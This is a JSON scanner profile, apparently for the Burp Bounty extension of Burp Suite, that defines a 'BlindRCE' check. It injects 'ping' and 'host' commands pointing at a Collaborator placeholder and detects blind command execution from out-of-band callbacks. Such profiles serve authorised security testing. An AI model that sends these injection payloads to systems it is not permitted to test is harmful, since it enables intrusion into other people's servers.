[{"Name":"BlindRCE",
"Active":true,
"Scanner":1,
"Author":"@egarme",
"Payloads":["ping -c 2 {BC}",
"host {BC}"],
"Encoder":[],
"UrlEncode":false,
"CharsToUrlEncode":"",
"Grep":[],
"Tags":["Collaborator",
"RCE"],
"PayloadResponse":false,
"NotResponse":false,
"TimeOut":"",
"isTime":false,
"contentLength":"",
"iscontentLength":false,
"CaseSensitive":false,
"isReplace":false,
"Replace1":"",
"Replace2":"",
"ExcludeHTTP":false,
"OnlyHTTP":false,
"IsContentType":false,
"ContentType":"",
"NegativeCT":false,
"IsResponseCode":false,
"ResponseCode":"",
"NegativeRC":false,
"MatchType":1,
"RedirType":4,
"MaxRedir":0,
"spaceEncode":false,
"payloadPosition":1,
"sEncode":"",
"payloadsFile":"",
"grepsFile":"",
"IssueName":"BlindRCE",
"IssueSeverity":"High",
"IssueConfidence":"Tentative",
"IssueDetail":"Blind RCE with el payload:   \u003cgrep\u003e",
"RemediationDetail":"",
"IssueBackground":"",
"RemediationBackground":""}]